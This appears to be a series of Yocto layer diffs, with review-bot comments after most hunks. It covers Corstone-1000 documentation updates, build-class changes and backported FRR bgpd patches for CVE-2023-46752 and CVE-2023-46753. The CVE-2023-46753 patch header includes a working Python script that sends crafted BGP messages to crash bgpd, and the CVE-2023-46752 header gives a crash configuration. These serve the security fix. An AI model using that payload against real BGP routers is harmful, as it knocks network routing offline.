+local_conf_header:
+ testimage: |
+ TESTIMAGE_AUTO = "${ACS_TEST}"
+
+target:
+ - arm-systemready-ir-acs
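Review bot: TESTIMAGE_AUTO = "${ACS_TEST}" takes its value straight from the environment, and nothing in this new file says which values are expected or what they cost. Add a comment next to the env entry stating that "1" triggers the testimage run, which the kas file says takes around 12-24h, and that the default "0" leaves it off.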
diff --git a/meta-arm/kas/arm-systemready-ir-acs.yml b/meta-arm/kas/arm-systemready-ir-acs.yml
index 38604d7f87..aef3e71221 100644
--- a/meta-arm/kas/arm-systemready-ir-acs.yml
+++ b/meta-arm/kas/arm-systemready-ir-acs.yml
@@ -8,10 +8,5 @@ env:
# The full testimage run typically takes around 12-24h on fvp-base.
TEST_OVERALL_TIMEOUT: "${@ 24*60*60}"
-local_conf_header:
- systemready-ir-acs: |
- IMAGE_CLASSES:append = " testimage"
-
-
target:
- arm-systemready-ir-acs
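Review bot: With the IMAGE_CLASSES:append = " testimage" block removed, this kas file still sets TEST_OVERALL_TIMEOUT but no longer shows where testimage comes from. The commit message lists "arm-systemready: Add parted dependency and inherit testimage", so a short comment here pointing at the class that now inherits it would keep the timeout setting from looking orphaned to someone reading this file alone.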
diff --git a/meta-arm/meta-arm-bsp/documentation/corstone1000/software-architecture.rst b/meta-arm/meta-arm-bsp/documentation/corstone1000/software-architecture.rst
index ce8bd7e0d0..6bc8aceab8 100644
--- a/meta-arm/meta-arm-bsp/documentation/corstone1000/software-architecture.rst
+++ b/meta-arm/meta-arm-bsp/documentation/corstone1000/software-architecture.rst
@@ -235,7 +235,7 @@ References
.. _Arm security features: https://www.arm.com/architecture/security-features/platform-security
.. _linux repo: https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/
.. _FF-A: https://developer.arm.com/documentation/den0077/latest
-.. _FF-M: https://developer.arm.com/-/media/Files/pdf/PlatformSecurityArchitecture/Architect/DEN0063-PSA_Firmware_Framework-1.0.0-2.pdf?revision=2d1429fa-4b5b-461a-a60e-4ef3d8f7f4b4&hash=3BFD6F3E687F324672F18E5BE9F08EDC48087C93
+.. _FF-M: https://developer.arm.com/architectures/Firmware%20Framework%20for%20M-Profile
.. _FWU: https://developer.arm.com/documentation/den0118/a/
.. _OPTEE-OS: https://github.com/OP-TEE/optee_os
.. _PSA: https://www.psacertified.org/
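Review bot: The new FF-M target is a landing page with percent-encoded spaces in the path, while the link it replaces pointed at a specific document (DEN0063, PSA Firmware Framework 1.0.0-2). The neighbouring FF-A and FWU entries use the documentation/<document-id> form; using the same form for FF-M, if one exists for DEN0063, would keep the reference tied to a specific specification rather than a page whose content can change.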
diff --git a/meta-arm/meta-arm-bsp/documentation/corstone1000/user-guide.rst b/meta-arm/meta-arm-bsp/documentation/corstone1000/user-guide.rst
index 134ed41d01..318cddfd7d 100644
--- a/meta-arm/meta-arm-bsp/documentation/corstone1000/user-guide.rst
+++ b/meta-arm/meta-arm-bsp/documentation/corstone1000/user-guide.rst
@@ -18,7 +18,7 @@ for more information.
Prerequisites
-------------
-This guide assumes that your host PC is running Ubuntu 20.04 LTS, with at least
+This guide assumes that your host machine is running Ubuntu 20.04 LTS, with at least
32GB of free disk space and 16GB of RAM as minimum requirement.
The following prerequisites must be available on the host system:
@@ -435,7 +435,7 @@ running the ACS tests.
dd conv=notrunc if=openSUSE-Tumbleweed-ARM-JeOS-efi.aarch64-<date>-Snapshot<date>.raw skip=<blockaddress_1st_partition> of=corstone1000-efi-partition.img seek=<blockaddress_1st_partition> iflag=fullblock seek=<blockaddress_1st_partition> bs=512 count=<sectorsize_1s_partition> && sync
-#. Use the provided disk-layout below to label the ESP correctly.
+#. Create the file efi_disk.layout locally. Copy the content of provided disk layout below to the efi_disk.layout to label the ESP correctly.
efi_disk.layout
::
@@ -470,7 +470,10 @@ running the ACS tests.
**Using ESP in FPGA:**
Once the ESP is created, it needs to be flashed to a second USB drive different than ACS image.
-This can be done with the development machine.
+This can be done with the development machine. In the given example here
+we assume the USB device is ``/dev/sdb`` (the user should use ``lsblk`` command to
+confirm). Be cautious here and don't confuse your host machine own hard drive with the
+USB drive. Run the following commands to prepare the ACS image in USB stick:
::
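Review bot: The last added sentence, "Run the following commands to prepare the ACS image in USB stick:", looks copied from the ACS image section further down; this paragraph is about flashing the ESP to a second USB drive "different than ACS image", so it should say the ESP image. Since the commands that follow write to a raw block device, it would also help to say explicitly that /dev/sdb here is the second (ESP) stick and that the lsblk check must be repeated for it, rather than reusing the device name from the ACS image example.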
@@ -560,7 +563,7 @@ BOOT partition contains the following:
└── ramdisk-busybox.img
RESULT partition is used to store the test results.
-**NOTE**: PLEASE MAKE SURE THAT THE RESULT PARTITION IS EMPTY BEFORE YOU START THE TESTING. OTHERWISE THE TEST RESULTS
+**NOTE**: PLEASE MAKE SURE THAT "acs_results" FOLDER UNDER THE RESULT PARTITION IS EMPTY BEFORE YOU START THE TESTING. OTHERWISE THE TEST RESULTS
WILL NOT BE CONSISTENT
FPGA instructions for ACS image
@@ -589,7 +592,7 @@ SystemReady release in this repository.
Then, the user should prepare a USB stick with ACS image. In the given example here,
we assume the USB device is ``/dev/sdb`` (the user should use ``lsblk`` command to
-confirm). Be cautious here and don't confuse your host PC's own hard drive with the
+confirm). Be cautious here and don't confuse your host machine own hard drive with the
USB drive. Run the following commands to prepare the ACS image in USB stick:
::
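Review bot: The replacement "your host machine own hard drive" drops the possessive that "host PC's own hard drive" had; it should read "your host machine's own hard drive". The same wording is introduced in the ESP section added earlier in this file and needs the same fix.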
@@ -604,6 +607,11 @@ and then boot the board.
The FPGA will reset multiple times during the test, and it might take approx. 24-36 hours to finish the test.
+**NOTE**: The USB stick which contains the ESP partition might cause grub to
+unable to find the bootable partition (only in the FPGA). If that's the case, please
+remove the USB stick and run the ACS tests. ESP partition can be mounted after
+the platform is booted to linux at the end of the ACS tests.
+
FVP instructions for ACS image and run
======================================
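Review bot: The added NOTE says "might cause grub to unable to find the bootable partition" (missing "be") and then "please remove the USB stick" without saying which one; two sticks are in use at this point, the ACS image and the ESP. State that it is the ESP stick that should be removed, and say when it has to be re-inserted relative to the end of the ACS run, since the sentence about mounting the ESP partition after boot to Linux leaves that to the reader.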
@@ -639,6 +647,20 @@ the test. At the end of test, the FVP host terminal will halt showing a shell pr
Once test is finished, the FVP can be stoped, and result can be copied following above
instructions.
+**NOTE:** A rare issue has been noticed (5-6% occurence) during which the FVP hangs during booting the system while running ACS tests.
+If this happens, please apply the following patch, rebuild the software stack for FVP and re-run the ACS tests.
+
+::
+
+ cd <_workspace>
+ git clone https://git.gitlab.arm.com/arm-reference-solutions/systemready-patch.git -b CORSTONE1000-2023.11
+ cp -f systemready-patch/embedded-a/corstone1000/sr_ir_workaround/0001-embedded-a-corstone1000-sr-ir-workaround.patch meta-arm
+ cd meta-arm
+ git am 0001-embedded-a-corstone1000-sr-ir-workaround.patch
+ cd ..
+ kas shell meta-arm/kas/corstone1000-fvp.yml:meta-arm/ci/debug.yml -c="bitbake u-boot -c cleanall; bitbake trusted-firmware-a -c cleanall; corstone1000-image -c cleanall; bitbake corstone1000-image"
+
+
Common to FVP and FPGA
======================
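Review bot: In the added `kas shell` line, the third command inside the `-c` string is `corstone1000-image -c cleanall` with no `bitbake` in front of it, so the shell tries to execute `corstone1000-image` as a program and the image is never cleaned; it should read `bitbake corstone1000-image -c cleanall`. Separately, "occurence" should be "occurrence", and the `git clone` selects the patch source by name (`-b CORSTONE1000-2023.11`); if that is a branch rather than a tag, the patch fed to `git am` can change under the reader, so pointing at a tag or commit would keep the workaround reproducible.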
@@ -657,7 +679,7 @@ The results can be fetched from the ``acs_results`` folder in the RESULT partiti
Manual capsule update and ESRT checks
-------------------------------------
-The following section describes running manual capsule update with the ``direct`` method.
+The following section describes running manual capsule update.
The steps described in this section perform manual capsule update and show how to use the ESRT feature
to retrieve the installed capsule details.
@@ -681,6 +703,13 @@ Download u-boot under <_workspace> and install tools:
make tools-only_defconfig
make tools-only
+**NOTE:** The following error could happen if the linux build system does not have "libgnutls28-dev".
+ **error: "tools/mkeficapsule.c:21:10: fatal error: gnutls/gnutls.h: No such file or directory"**. If that's the case please install libgnutls28-dev and its dependencies by using the following command.
+
+::
+
+ sudo apt-get install -y libgnutls28-dev
+
Download systemready-patch repo under <_workspace>:
::
@@ -788,20 +817,7 @@ Then, unmount the IR image:
sudo umount /mnt/test
-**NOTE:**
-
-The size of first partition in the image file is calculated in the following way. The data is
-just an example and might vary with different ir-acs-live-image-generic-arm64.wic files.
-
-::
-
- fdisk -lu <path-to-img>/ir-acs-live-image-generic-arm64.wic
- -> Device Start End Sectors Size Type
- <path-to-img>/ir-acs-live-image-generic-arm64.wic1 2048 206847 204800 100M Microsoft basic data
- <path-to-img>/ir-acs-live-image-generic-arm64.wic2 206848 1024239 817392 399.1M Linux filesystem
- <path-to-img>/ir-acs-live-image-generic-arm64.wic3 1026048 1128447 102400 50M Microsoft basic data
-
- -> <offset_1st_partition> = 2048 * 512 (sector size) = 1048576
+**NOTE:** Please refer to `FVP instructions for ACS image and run`_ section to find the first partition offset.
******************************
Performing the capsule update
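Review bot: The replacement NOTE removes the worked `fdisk -lu` listing and the `2048 * 512 (sector size) = 1048576` computation and relies entirely on the `FVP instructions for ACS image and run`_ cross-reference. Please confirm that section actually shows how to derive `<offset_1st_partition>`; if it does not, readers of this section lose the only derivation of that value.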
@@ -819,10 +835,7 @@ Run the FVP with the IR prebuilt image:
<_workspace>/meta-arm/scripts/runfvp --terminals=xterm <_workspace>/build/tmp/deploy/images/corstone1000-fvp/corstone1000-image-corstone1000-fvp.fvpconf -- -C board.msd_mmc.p_mmc_file=<path-to-img>/ir-acs-live-image-generic-arm64.wic
-**NOTE:**
-
-<path-to-img> must start from the root directory.
-make sure there are no spaces before or after of "=". board.msd_mmc.p_mmc_file=<path-to-img>/ir-acs-live-image-generic-arm64.wic.
+**NOTE:** <path-to-img> must start from the root directory. make sure there are no spaces before or after of "=". board.msd_mmc.p_mmc_file=<path-to-img>/ir-acs-live-image-generic-arm64.wic.
Running the FPGA with the IR prebuilt image
===========================================
@@ -1060,6 +1073,15 @@ documentation.
On FPGA, please update the cs1000.bin on the SD card with the newly generated wic file.
+**NOTE:** Skip the shim patch only applies to Debian installation. The user should remove the patch from meta-arm before running the software to boot OpenSUSE or executing any other tests in this user guide. You can make sure of removing the skip the shim patch by executing the steps below.
+
+::
+
+ cd <_workspace>/meta-arm
+ git reset --hard HEAD~1
+ cd ..
+ kas shell meta-arm/kas/corstone1000-fvp.yml:meta-arm/ci/debug.yml -c="bitbake u-boot -c cleanall; bitbake trusted-firmware-a -c cleanall; corstone1000-image -c cleanall; bitbake corstone1000-image"
+
*************************************************
Preparing the Installation Media
*************************************************
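Review bot: `git reset --hard HEAD~1` in the added steps assumes the skip-the-shim patch is the most recent commit in meta-arm, and it also discards any uncommitted changes in the tree. If anything was committed after it (for example the sr_ir_workaround patch that the earlier FVP NOTE applies with `git am`), the wrong commit is dropped. Suggest having the reader check `git log -1` first, or remove the patch by name with `git revert`. The `kas shell` line here also has the same missing `bitbake` before `corstone1000-image -c cleanall` as the earlier FVP NOTE.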
@@ -1084,7 +1106,7 @@ This can be done with your development machine.
In the example given below, we assume the USB device is ``/dev/sdb`` (the user
should use the `lsblk` command to confirm).
-**NOTE:** Please don't confuse your host PC's own hard drive with the USB drive.
+**NOTE:** Please don't confuse your host machine own hard drive with the USB drive.
Then, copy the contents of the iso file into the first USB stick by running the
following command in the development machine:
@@ -1100,6 +1122,7 @@ To test Linux distro install and boot on FVP, the user should prepare an mmc ima
With a minimum size of 8GB formatted with gpt.
::
+
#Generating mmc2
dd if=/dev/zero of=<_workspace>/mmc2_file.img bs=1 count=0 seek=8G; sync;
parted -s mmc2_file.img mklabel gpt
@@ -1147,7 +1170,7 @@ As the installation process for Debian is different than the one for openSUSE,
Debian may need some extra steps, that are indicated below:
During Debian installation, please answer the following question:
- - "Force GRUB installation to the EFI removable media path?" Yes
+ - "Force grub installation to the EFI removable media path?" Yes
- "Update NVRAM variables to automatically boot into Debian?" No
If the grub installation fails, these are the steps to follow on the subsequent
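Review bot: The lowercase change lands inside a quoted installer question ("Force grub installation to the EFI removable media path?"). A quoted prompt should match what the installer prints so the reader can recognise it on screen; keep the installer's own capitalisation inside the quotes even if the surrounding prose standardises on "grub".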
@@ -1198,7 +1221,7 @@ and run this command to boot into the installed OS:
<_workspace>/meta-arm/scripts/runfvp --terminals=xterm <_workspace>/build/tmp/deploy/images/corstone1000-fvp/corstone1000-image-corstone1000-fvp.fvpconf -- -C board.msd_mmc.p_mmc_file="<_workspace>/mmc2_file.img"
-Once the FVP begins booting, you will need to quickly change the boot option in GRUB,
+Once the FVP begins booting, you will need to quickly change the boot option in grub,
to boot into recovery mode.
**NOTE:** This option will disappear quickly, so it's best to preempt it.
@@ -1212,11 +1235,21 @@ Proceed to edit the following files accordingly:
::
- vi /etc/systemd/system.conf #Only applicable to Debian
+ #Only applicable to Debian
+ vi /etc/systemd/system.conf
DefaultDeviceTimeoutSec=infinity
- vi /usr/lib/systemd/system.conf # Only applicable to openSUSE
+
+::
+
+ #Only applicable to openSUSE
+ vi /usr/lib/systemd/system.conf
DefaultDeviceTimeoutSec=infinity
+ The system.conf has been moved from /etc/systemd/ to /usr/lib/systemd/ and directly modifying
+ the /usr/lib/systemd/system.conf is not working and it is getting overridden. We have to create
+ drop ins system configurations in /etc/systemd/system.conf.d/ directory. So, copy the
+ /usr/lib/systemd/system.conf to /etc/systemd/system.conf.d/ directory after the mentioned modifications.
+
The file to be edited next is different depending on the installed distro:
::
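Review bot: The added openSUSE paragraph says that modifying /usr/lib/systemd/system.conf directly does not work, yet the step right above it still tells the reader to `vi /usr/lib/systemd/system.conf`, and the paragraph is indented under `::` so it renders as part of the literal block rather than as prose. Suggest un-indenting the explanation and having the reader create a small drop-in file in /etc/systemd/system.conf.d/ that contains only the `[Manager]` section with `DefaultDeviceTimeoutSec=infinity`, instead of editing the vendor file and copying it whole.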
@@ -1242,6 +1275,8 @@ The user should see a login prompt after booting, for example, for debian:
Login with the username root and its corresponding password (already set at
installation time).
+**NOTE:** Debian/OpenSUSE Timeouts are not applicable for all systems. Some systems are faster than the others (especially when running the FVP) and works well with default timeouts. If the system boots to Debian or OpenSUSE unmodified, the user can skip this section.
+
PSA API tests
-------------
@@ -1261,7 +1296,7 @@ First, load FF-A TEE kernel module:
::
- insmod /lib/modules/*-yocto-standard/extra/arm-ffa-tee.ko
+ insmod /lib/modules/*-yocto-standard/updates/arm-ffa-tee.ko
Then, check whether the FF-A TEE driver is loaded correctly by using the following command:
@@ -1273,7 +1308,7 @@ The output should be:
::
- arm_ffa_tee 16384 - - Live 0xffffffc000510000 (O)
+ arm_ffa_tee <ID> - - Live <address> (O)
Now, run the PSA API tests in the following order:
diff --git a/meta-arm/meta-arm-systemready/classes/arm-systemready-acs.bbclass b/meta-arm/meta-arm-systemready/classes/arm-systemready-acs.bbclass
index e988802368..28e800c866 100644
--- a/meta-arm/meta-arm-systemready/classes/arm-systemready-acs.bbclass
+++ b/meta-arm/meta-arm-systemready/classes/arm-systemready-acs.bbclass
@@ -12,12 +12,11 @@
INHIBIT_DEFAULT_DEPS = "1"
COMPATIBLE_HOST = "aarch64-*"
PACKAGE_ARCH = "${MACHINE_ARCH}"
-inherit nopackages deploy rootfs-postcommands ${IMAGE_CLASSES} python3native
+inherit nopackages deploy rootfs-postcommands ${IMAGE_CLASSES} python3native testimage
do_configure[noexec] = "1"
do_compile[noexec] = "1"
do_install[noexec] = "1"
-do_testimage[depends] += "mtools-native:do_populate_sysroot"
# Deploy with this suffix so it is picked up in the machine configuration
IMAGE_DEPLOY_SUFFIX ?= ".wic"
@@ -80,7 +79,9 @@ RM_WORK_EXCLUDE_ITEMS += "${@ os.path.basename(d.getVar('TEST_LOG_DIR')) }"
do_testimage[postfuncs] += "acs_logs_handle"
do_testimage[depends] += "edk2-test-parser-native:do_populate_sysroot \
- arm-systemready-scripts-native:do_populate_sysroot"
+ arm-systemready-scripts-native:do_populate_sysroot \
+ mtools-native:do_populate_sysroot \
+ parted-native:do_populate_sysroot"
# Process the logs
python acs_logs_handle() {
diff --git a/meta-openembedded/meta-networking/recipes-devtools/python/python3-scapy_2.5.0.bb b/meta-openembedded/meta-networking/recipes-devtools/python/python3-scapy_2.5.0.bb
index cc3f2ee1dd..4858e4e579 100644
--- a/meta-openembedded/meta-networking/recipes-devtools/python/python3-scapy_2.5.0.bb
+++ b/meta-openembedded/meta-networking/recipes-devtools/python/python3-scapy_2.5.0.bb
@@ -16,7 +16,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=b234ee4d69f5fce4486a80fdaf4a4263"
# If you want ptest support, use the git repo
# UTscapy does not exist in the pypi pkg
#
-SRCREV = "9473f77d8b548c8e478e52838bdd4c12f5d4f4ff"
+SRCREV = "0474c37bf1d147c969173d52ab3ac76d2404d981"
SRC_URI = "git://github.com/secdev/scapy.git;branch=master;protocol=https \
file://run-ptest"
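Review bot: `SRCREV` changes while the recipe file name, and therefore `PV`, stays at 2.5.0, and nothing in the hunk says what the new revision is. Please state in the commit message whether `0474c37bf1d147c969173d52ab3ac76d2404d981` is still the 2.5.0 release point or a later commit on `master`, and if it is the latter, reflect that in `PV` (for example with a `+git` suffix) so the version reported for CVE matching is accurate.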
diff --git a/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-46752.patch b/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-46752.patch
new file mode 100644
index 0000000000..e1f30248ca
--- /dev/null
+++ b/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-46752.patch
@@ -0,0 +1,125 @@
+From b08afc81c60607a4f736f418f2e3eb06087f1a35 Mon Sep 17 00:00:00 2001
+From: Donatas Abraitis <donatas@opensourcerouting.org>
+Date: Fri, 20 Oct 2023 17:49:18 +0300
+Subject: [PATCH] bgpd: Handle MP_REACH_NLRI malformed packets with session
+ reset
+
+Avoid crashing bgpd.
+
+```
+(gdb)
+bgp_mp_reach_parse (args=<optimized out>, mp_update=0x7fffffffe140) at bgpd/bgp_attr.c:2341
+2341 stream_get(&attr->mp_nexthop_global, s, IPV6_MAX_BYTELEN);
+(gdb)
+stream_get (dst=0x7fffffffe1ac, s=0x7ffff0006e80, size=16) at lib/stream.c:320
+320 {
+(gdb)
+321 STREAM_VERIFY_SANE(s);
+(gdb)
+323 if (STREAM_READABLE(s) < size) {
+(gdb)
+34 return __builtin___memcpy_chk (__dest, __src, __len, __bos0 (__dest));
+(gdb)
+
+Thread 1 "bgpd" received signal SIGSEGV, Segmentation fault.
+0x00005555556e37be in route_set_aspath_prepend (rule=0x555555aac0d0, prefix=0x7fffffffe050,
+ object=0x7fffffffdb00) at bgpd/bgp_routemap.c:2282
+2282 if (path->attr->aspath->refcnt)
+(gdb)
+```
+
+With the configuration:
+
+```
+ neighbor 127.0.0.1 remote-as external
+ neighbor 127.0.0.1 passive
+ neighbor 127.0.0.1 ebgp-multihop
+ neighbor 127.0.0.1 disable-connected-check
+ neighbor 127.0.0.1 update-source 127.0.0.2
+ neighbor 127.0.0.1 timers 3 90
+ neighbor 127.0.0.1 timers connect 1
+ address-family ipv4 unicast
+ redistribute connected
+ neighbor 127.0.0.1 default-originate
+ neighbor 127.0.0.1 route-map RM_IN in
+ exit-address-family
+!
+route-map RM_IN permit 10
+ set as-path prepend 200
+exit
+```
+
+Reported-by: Iggy Frankovic <iggyfran@amazon.com>
+Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
+Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/b08afc81c60607a4f736f418f2e3eb06087f1a35]
+CVE: CVE-2023-46752
+Signed-off-by: Jonas Gorski <jonas.gorski@bisdn.de>
+---
+ bgpd/bgp_attr.c | 6 +-----
+ bgpd/bgp_attr.h | 1 -
+ bgpd/bgp_packet.c | 6 +-----
+ 3 files changed, 2 insertions(+), 11 deletions(-)
+
+diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
+index 6925aff727e2..e7bb42a5d989 100644
+--- a/bgpd/bgp_attr.c
++++ b/bgpd/bgp_attr.c
+@@ -2421,7 +2421,7 @@ int bgp_mp_reach_parse(struct bgp_attr_parser_args *args,
+
+ mp_update->afi = afi;
+ mp_update->safi = safi;
+- return BGP_ATTR_PARSE_EOR;
++ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_MAL_ATTR, 0);
+ }
+
+ mp_update->afi = afi;
+@@ -3759,10 +3759,6 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr,
+ goto done;
+ }
+
+- if (ret == BGP_ATTR_PARSE_EOR) {
+- goto done;
+- }
+-
+ if (ret == BGP_ATTR_PARSE_ERROR) {
+ flog_warn(EC_BGP_ATTRIBUTE_PARSE_ERROR,
+ "%s: Attribute %s, parse error", peer->host,
+diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h
+index 961e5f122470..fc347e7a1b4b 100644
+--- a/bgpd/bgp_attr.h
++++ b/bgpd/bgp_attr.h
+@@ -364,7 +364,6 @@ enum bgp_attr_parse_ret {
+ /* only used internally, send notify + convert to BGP_ATTR_PARSE_ERROR
+ */
+ BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3,
+- BGP_ATTR_PARSE_EOR = -4,
+ };
+
+ struct bpacket_attr_vec_arr;
+diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c
+index b585591e2f69..5ecf343b6657 100644
+--- a/bgpd/bgp_packet.c
++++ b/bgpd/bgp_packet.c
+@@ -2397,8 +2397,7 @@ static int bgp_update_receive(struct peer_connection *connection,
+ * Non-MP IPv4/Unicast EoR is a completely empty UPDATE
+ * and MP EoR should have only an empty MP_UNREACH
+ */
+- if ((!update_len && !withdraw_len && nlris[NLRI_MP_UPDATE].length == 0)
+- || (attr_parse_ret == BGP_ATTR_PARSE_EOR)) {
++ if (!update_len && !withdraw_len && nlris[NLRI_MP_UPDATE].length == 0) {
+ afi_t afi = 0;
+ safi_t safi;
+ struct graceful_restart_info *gr_info;
+@@ -2419,9 +2418,6 @@ static int bgp_update_receive(struct peer_connection *connection,
+ && nlris[NLRI_MP_WITHDRAW].length == 0) {
+ afi = nlris[NLRI_MP_WITHDRAW].afi;
+ safi = nlris[NLRI_MP_WITHDRAW].safi;
+- } else if (attr_parse_ret == BGP_ATTR_PARSE_EOR) {
+- afi = nlris[NLRI_MP_UPDATE].afi;
+- safi = nlris[NLRI_MP_UPDATE].safi;
+ }
+
+ if (afi && peer->afc[afi][safi]) {
+--
+2.42.1
+
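Review bot: The gdb trace in the commit message ends in `route_set_aspath_prepend` dereferencing `path->attr->aspath->refcnt`, but the hunks only change what the parser returns for this one malformed MP_REACH_NLRI case (`bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_MAL_ATTR, 0)` instead of `BGP_ATTR_PARSE_EOR`); the route-map code still assumes `aspath` is set. That is fine for a backport, but it means this patch closes one route to the crash rather than the dereference itself, so it should not be carried or dropped independently of the other bgpd CVE patches added to the recipe in this commit. A sentence in the patch header saying so would help whoever rebases the recipe next.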
diff --git a/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-46753.patch b/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-46753.patch
new file mode 100644
index 0000000000..6bf159aba8
--- /dev/null
+++ b/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-46753.patch
@@ -0,0 +1,117 @@
+From d8482bf011cb2b173e85b65b4bf3d5061250cdb9 Mon Sep 17 00:00:00 2001
+From: Donatas Abraitis <donatas@opensourcerouting.org>
+Date: Mon, 23 Oct 2023 23:34:10 +0300
+Subject: [PATCH] bgpd: Check mandatory attributes more carefully for UPDATE
+ message
+
+If we send a crafted BGP UPDATE message without mandatory attributes, we do
+not check if the length of the path attributes is zero or not. We only check
+if attr->flag is at least set or not. Imagine we send only unknown transit
+attribute, then attr->flag is always 0. Also, this is true only if graceful-restart
+capability is received.
+
+A crash:
+
+```
+bgpd[7834]: [TJ23Y-GY0RH] 127.0.0.1 Unknown attribute is received (type 31, length 16)
+bgpd[7834]: [PCFFM-WMARW] 127.0.0.1(donatas-pc) rcvd UPDATE wlen 0 attrlen 20 alen 17
+BGP[7834]: Received signal 11 at 1698089639 (si_addr 0x0, PC 0x55eefd375b4a); aborting...
+BGP[7834]: /usr/local/lib/libfrr.so.0(zlog_backtrace_sigsafe+0x6d) [0x7f3205ca939d]
+BGP[7834]: /usr/local/lib/libfrr.so.0(zlog_signal+0xf3) [0x7f3205ca9593]
+BGP[7834]: /usr/local/lib/libfrr.so.0(+0xf5181) [0x7f3205cdd181]
+BGP[7834]: /lib/x86_64-linux-gnu/libpthread.so.0(+0x12980) [0x7f3204ff3980]
+BGP[7834]: /usr/lib/frr/bgpd(+0x18ab4a) [0x55eefd375b4a]
+BGP[7834]: /usr/local/lib/libfrr.so.0(route_map_apply_ext+0x310) [0x7f3205cd1290]
+BGP[7834]: /usr/lib/frr/bgpd(+0x163610) [0x55eefd34e610]
+BGP[7834]: /usr/lib/frr/bgpd(bgp_update+0x9a5) [0x55eefd35c1d5]
+BGP[7834]: /usr/lib/frr/bgpd(bgp_nlri_parse_ip+0xb7) [0x55eefd35e867]
+BGP[7834]: /usr/lib/frr/bgpd(+0x1555e6) [0x55eefd3405e6]
+BGP[7834]: /usr/lib/frr/bgpd(bgp_process_packet+0x747) [0x55eefd345597]
+BGP[7834]: /usr/local/lib/libfrr.so.0(event_call+0x83) [0x7f3205cef4a3]
+BGP[7834]: /usr/local/lib/libfrr.so.0(frr_run+0xc0) [0x7f3205ca10a0]
+BGP[7834]: /usr/lib/frr/bgpd(main+0x409) [0x55eefd2dc979]
+```
+
+Sending:
+
+```
+import socket
+import time
+
+OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02"
+b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02"
+b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00"
+b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d"
+b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01"
+b"\x80\x00\x00\x00")
+
+KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+b"\xff\xff\xff\xff\xff\xff\x00\x13\x04")
+
+UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff003c0200000014ff1f001000040146464646460004464646464646664646f50d05800100010200ffff000000")
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(('127.0.0.2', 179))
+s.send(OPEN)
+data = s.recv(1024)
+s.send(KEEPALIVE)
+data = s.recv(1024)
+s.send(UPDATE)
+data = s.recv(1024)
+time.sleep(1000)
+s.close()
+```
+
+Reported-by: Iggy Frankovic <iggyfran@amazon.com>
+Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
+Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/d8482bf011cb2b173e85b65b4bf3d5061250cdb9]
+CVE: CVE-2023-46753
+Signed-off-by: Jonas Gorski <jonas.gorski@bisdn.de>
+---
+ bgpd/bgp_attr.c | 10 ++++++----
+ 1 file changed, 6 insertions(+), 4 deletions(-)
+
+diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
+index e7bb42a5d989..cf2dbe65b805 100644
+--- a/bgpd/bgp_attr.c
++++ b/bgpd/bgp_attr.c
+@@ -3385,13 +3385,15 @@ bgp_attr_unknown(struct bgp_attr_parser_args *args)
+ }
+
+ /* Well-known attribute check. */
+-static int bgp_attr_check(struct peer *peer, struct attr *attr)
++static int bgp_attr_check(struct peer *peer, struct attr *attr,
++ bgp_size_t length)
+ {
+ uint8_t type = 0;
+
+ /* BGP Graceful-Restart End-of-RIB for IPv4 unicast is signaled as an
+ * empty UPDATE. */
+- if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag)
++ if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag &&
++ !length)
+ return BGP_ATTR_PARSE_PROCEED;
+
+ /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required
+@@ -3443,7 +3445,7 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr,
+ enum bgp_attr_parse_ret ret;
+ uint8_t flag = 0;
+ uint8_t type = 0;
+- bgp_size_t length;
++ bgp_size_t length = 0;
+ uint8_t *startp, *endp;
+ uint8_t *attr_endp;
+ uint8_t seen[BGP_ATTR_BITMAP_SIZE];
+@@ -3831,7 +3833,7 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr,
+ }
+
+ /* Check all mandatory well-known attributes are present */
+- ret = bgp_attr_check(peer, attr);
++ ret = bgp_attr_check(peer, attr, length);
+ if (ret < 0)
+ goto done;
+
+--
+2.42.1
+
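Review bot: The `length` handed to `bgp_attr_check(peer, attr, length)` in the last hunk is the local declared beside `flag` and `type` in `bgp_attr_parse`, which this patch has to initialise to 0. If that variable holds the length of the attribute currently being parsed, the new `!length` test sees only the last attribute's length, not the total path-attribute length the commit message describes, and an UPDATE whose final attribute has zero length would still satisfy it. Please confirm against the full function, and add a short comment on the new parameter saying which length it carries.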
diff --git a/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-47234.patch b/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-47234.patch
